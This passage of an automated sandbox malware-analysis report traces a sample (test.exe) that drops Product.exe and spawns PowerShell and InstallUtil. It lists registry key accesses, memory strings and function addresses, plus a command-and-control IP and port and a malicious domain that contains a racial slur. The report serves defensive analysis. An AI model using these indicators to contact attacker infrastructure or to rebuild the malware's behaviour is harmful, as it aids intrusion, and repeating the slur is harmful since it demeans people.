                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32Jump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32Jump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32Jump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32Jump to behavior
                      Source: global trafficTCP traffic: 192.168.2.9:49705 -> 103.230.121.81:30120
                      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                      Source: global trafficDNS traffic detected: DNS query: iam.nigga.dad
                      Source: powershell.exe, 00000002.00000002.1746251721.00000251CC70A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microso
                      Source: powershell.exe, 00000002.00000002.1704194761.00000251C3F32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1688542792.0000019310073000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: powershell.exe, 00000006.00000002.1586950677.0000019300229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: test.exe, 00000000.00000002.1519417039.0000000005F16000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://schemas.microso
                      Source: powershell.exe, 00000002.00000002.1590895371.00000251B40E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1586950677.0000019300229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                      Source: test.exe, 00000000.00000002.1505562731.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1590895371.00000251B3EC1000.00000004.00000800.00020000.00000000.sdmp, Product.exe, 00000004.00000002.1545385143.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, Product.exe, 00000004.00000002.1545385143.0000000003471000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2722239626.0000000002CD0000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2722239626.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1586950677.0000019300001000.00000004.00000800.00020000.00000000.sdmp, Product.exe, 0000000C.00000002.2217363905.0000000002996000.00000004.00000800.00020000.00000000.sdmp, Product.exe, 0000000C.00000002.2217363905.000000000291D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 00000002.00000002.1590895371.00000251B40E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1586950677.0000019300229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                      Source: powershell.exe, 00000006.00000002.1586950677.0000019300229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: powershell.exe, 00000006.00000002.1732006045.0000019376FD0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
                      Source: powershell.exe, 00000002.00000002.1590895371.00000251B3EC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1586950677.0000019300001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                      Source: powershell.exe, 00000006.00000002.1688542792.0000019310073000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000006.00000002.1688542792.0000019310073000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000006.00000002.1688542792.0000019310073000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: powershell.exe, 00000006.00000002.1586950677.0000019300229000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: test.exe, 00000000.00000002.1513302058.0000000005790000.00000004.08000000.00040000.00000000.sdmp, test.exe, 00000000.00000002.1508460985.0000000004665000.00000004.00000800.00020000.00000000.sdmp, test.exe, 00000000.00000002.1508460985.000000000452E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                      Source: test.exe, 00000000.00000002.1513302058.0000000005790000.00000004.08000000.00040000.00000000.sdmp, test.exe, 00000000.00000002.1508460985.0000000004665000.00000004.00000800.00020000.00000000.sdmp, test.exe, 00000000.00000002.1508460985.000000000452E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                      Source: test.exe, 00000000.00000002.1513302058.0000000005790000.00000004.08000000.00040000.00000000.sdmp, test.exe, 00000000.00000002.1508460985.0000000004665000.00000004.00000800.00020000.00000000.sdmp, test.exe, 00000000.00000002.1508460985.000000000452E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                      Source: powershell.exe, 00000002.00000002.1704194761.00000251C3F32000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1688542792.0000019310073000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: test.exe, 00000000.00000002.1513302058.0000000005790000.00000004.08000000.00040000.00000000.sdmp, test.exe, 00000000.00000002.1508460985.0000000004665000.00000004.00000800.00020000.00000000.sdmp, test.exe, 00000000.00000002.1508460985.000000000452E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/11564914/23354;
                      Source: test.exe, 00000000.00000002.1513302058.0000000005790000.00000004.08000000.00040000.00000000.sdmp, test.exe, 00000000.00000002.1505562731.00000000030B1000.00000004.00000800.00020000.00000000.sdmp, test.exe, 00000000.00000002.1508460985.0000000004665000.00000004.00000800.00020000.00000000.sdmp, test.exe, 00000000.00000002.1508460985.000000000452E000.00000004.00000800.00020000.00000000.sdmp, Product.exe, 00000004.00000002.1545385143.00000000031A1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000005.00000002.2722239626.0000000002A71000.00000004.00000800.00020000.00000000.sdmp, Product.exe, 0000000C.00000002.2217363905.000000000291D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/14436606/23354
                      Source: test.exe, 00000000.00000002.1513302058.0000000005790000.00000004.08000000.00040000.00000000.sdmp, test.exe, 00000000.00000002.1508460985.0000000004665000.00000004.00000800.00020000.00000000.sdmp, test.exe, 00000000.00000002.1508460985.000000000452E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stackoverflow.com/q/2152978/23354

                      System Summary

                      barindex
                      Source: test.exe, DefinitionBridge.csLarge array initialization: FilterEfficientDefinition: array initializer size 543424
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_059D6E5B0_2_059D6E5B
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB6CF00_2_02EB6CF0
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB42E80_2_02EB42E8
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB42EC0_2_02EB42EC
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB42F40_2_02EB42F4
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB42C80_2_02EB42C8
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB42CC0_2_02EB42CC
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB42D50_2_02EB42D5
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB42A80_2_02EB42A8
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB42AC0_2_02EB42AC
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB42A10_2_02EB42A1
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB42B00_2_02EB42B0
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB42B50_2_02EB42B5
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB42890_2_02EB4289
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB428C0_2_02EB428C
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB42840_2_02EB4284
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB42940_2_02EB4294
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB42680_2_02EB4268
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB426D0_2_02EB426D
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB427C0_2_02EB427C
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB42440_2_02EB4244
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB425D0_2_02EB425D
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB422D0_2_02EB422D
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB42210_2_02EB4221
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB42390_2_02EB4239
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB42310_2_02EB4231
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB42350_2_02EB4235
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB42180_2_02EB4218
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB43EC0_2_02EB43EC
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB43F40_2_02EB43F4
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB43C80_2_02EB43C8
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB43C40_2_02EB43C4
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB43D80_2_02EB43D8
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB43DC0_2_02EB43DC
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB43A90_2_02EB43A9
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB43AD0_2_02EB43AD
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB43A00_2_02EB43A0
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB43B80_2_02EB43B8
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB43B50_2_02EB43B5
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB43810_2_02EB4381
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB43940_2_02EB4394
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB43600_2_02EB4360
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB43780_2_02EB4378
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB43490_2_02EB4349
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB43400_2_02EB4340
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB43500_2_02EB4350
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB43280_2_02EB4328
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB43240_2_02EB4324
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB43380_2_02EB4338
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB43300_2_02EB4330
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB430C0_2_02EB430C
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB43190_2_02EB4319
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB431C0_2_02EB431C
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB40ED0_2_02EB40ED
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB40F80_2_02EB40F8
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB40F00_2_02EB40F0
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB40F40_2_02EB40F4
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB40D90_2_02EB40D9
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB40D10_2_02EB40D1
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB40A00_2_02EB40A0
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB40A40_2_02EB40A4
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB40B50_2_02EB40B5
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB40840_2_02EB4084
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB40980_2_02EB4098
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB409C0_2_02EB409C
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB40910_2_02EB4091
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB406C0_2_02EB406C
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB40650_2_02EB4065
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB404C0_2_02EB404C
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB40440_2_02EB4044
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB40510_2_02EB4051
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB40200_2_02EB4020
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB40390_2_02EB4039
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB403D0_2_02EB403D
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB40340_2_02EB4034
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB40080_2_02EB4008
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB40010_2_02EB4001
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB40110_2_02EB4011
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB41EC0_2_02EB41EC
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB41E40_2_02EB41E4
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB41F80_2_02EB41F8
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB41FC0_2_02EB41FC
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB41F10_2_02EB41F1
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB41CC0_2_02EB41CC
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB41D80_2_02EB41D8
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB41D00_2_02EB41D0
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB41A90_2_02EB41A9
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB41A40_2_02EB41A4
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB41BC0_2_02EB41BC
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB41850_2_02EB4185
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB41910_2_02EB4191
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB41610_2_02EB4161
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB414C0_2_02EB414C
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB41580_2_02EB4158
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB41280_2_02EB4128
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB41390_2_02EB4139
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB413C0_2_02EB413C
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB41300_2_02EB4130
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB41000_2_02EB4100
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB41140_2_02EB4114
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB16E90_2_02EB16E9
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB16F80_2_02EB16F8
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB44200_2_02EB4420
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB44080_2_02EB4408
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB44110_2_02EB4411
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB3B2F0_2_02EB3B2F
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB3EE80_2_02EB3EE8
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB3EE00_2_02EB3EE0
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB3EE50_2_02EB3EE5
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB3EF40_2_02EB3EF4
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB3EC50_2_02EB3EC5
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB3ED90_2_02EB3ED9
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB3ED10_2_02EB3ED1
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB3EA80_2_02EB3EA8
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB3EAC0_2_02EB3EAC
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB3EA10_2_02EB3EA1
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB3EB90_2_02EB3EB9
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB3EB00_2_02EB3EB0
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB3EB40_2_02EB3EB4
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB3E890_2_02EB3E89
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB3E800_2_02EB3E80
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB3E980_2_02EB3E98
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB3E6C0_2_02EB3E6C
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB3E790_2_02EB3E79
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB3E7D0_2_02EB3E7D
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB3FED0_2_02EB3FED
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB3FFC0_2_02EB3FFC
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB3FC80_2_02EB3FC8
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB3FDC0_2_02EB3FDC
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB3FD10_2_02EB3FD1
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB3FA10_2_02EB3FA1
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB3FBC0_2_02EB3FBC
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB3F850_2_02EB3F85
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB3F9C0_2_02EB3F9C
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB3F940_2_02EB3F94
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB3F690_2_02EB3F69
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB3F6C0_2_02EB3F6C
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB3F780_2_02EB3F78
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB3F480_2_02EB3F48
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB3F4C0_2_02EB3F4C
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB3F440_2_02EB3F44
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB3F510_2_02EB3F51
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB3F540_2_02EB3F54
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB3F200_2_02EB3F20
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB3F380_2_02EB3F38
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB3F080_2_02EB3F08
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB3F0C0_2_02EB3F0C
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB3F100_2_02EB3F10
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB6CE10_2_02EB6CE1
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB1CFA0_2_02EB1CFA
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB1DD00_2_02EB1DD0
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB1D9A0_2_02EB1D9A
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB1D7B0_2_02EB1D7B
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB1D5E0_2_02EB1D5E
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB1D240_2_02EB1D24
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_02EB1D380_2_02EB1D38
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_056A37E80_2_056A37E8
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_056A03C70_2_056A03C7
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_056A14700_2_056A1470
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_056A06FF0_2_056A06FF
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_056B87600_2_056B8760
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_056B233B0_2_056B233B
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_056B92E90_2_056B92E9
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_056B7DA80_2_056B7DA8
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_056B7D980_2_056B7D98
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_056B87510_2_056B8751
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_056B88DE0_2_056B88DE
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_056BCA320_2_056BCA32
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_057F945E0_2_057F945E
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_057F27A00_2_057F27A0
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_057F76680_2_057F7668
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_057F4D700_2_057F4D70
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_057F6E180_2_057F6E18
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_057F0E880_2_057F0E88
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_057F59880_2_057F5988
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_057F27920_2_057F2792
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_057F76580_2_057F7658
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_057F70770_2_057F7077
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_057F50B80_2_057F50B8
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_057F63480_2_057F6348
                      Source: C:\Users\user\Desktop\test.exeCode function: 0_2_057F6E080_2_057F6E08
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 4_2_03016CF04_2_03016CF0
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 4_2_030116E94_2_030116E9
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 4_2_030116F84_2_030116F8
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 4_2_030144204_2_03014420
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 4_2_03016CE14_2_03016CE1
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 4_2_058703C74_2_058703C7
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 4_2_058714704_2_05871470
                      Source: C:\Users\user\AppData\Local\MethodSignature\dhrzb\Product.exeCode function: 4_2_058706FF4_2_058706FF
